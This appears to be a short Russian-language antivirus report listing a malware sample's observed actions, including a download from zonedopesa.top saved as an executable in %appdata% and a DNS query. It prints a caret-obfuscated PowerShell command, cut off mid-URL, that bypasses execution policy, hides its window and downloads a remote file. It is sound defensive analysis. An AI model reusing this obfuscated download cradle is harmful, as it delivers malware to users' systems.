Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^E^rSh^e^L^l^.ExE^ -E^XECUTIonPOLIc^Y^ ^BYPAss -^noP^r^oFIle^ ^-^WIN^do^ws^ty^lE^ ^h^idd^eN^ (NE^w-ObJ^Ect SY^St^E^M^.^N^E^T.wE^b^C^l^Ie^n^T)^.dOW^n^L^OAdf^iLE('http://www...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "pOW^E^rSh^e^L^l^.ExE^ -E^XECUTIonPOLIc^Y^ ^BYPAss -^noP^r^oFIle^ ^-^WIN^do^ws^ty^lE^ ^h^idd^eN^ (NE^w-ObJ^Ect SY^St^E^M^.^N^E^T.wE^b^C^l^Ie^n^T)^.dOW^n^L^OAdf^iLE('http://www...' (со скрытым окном)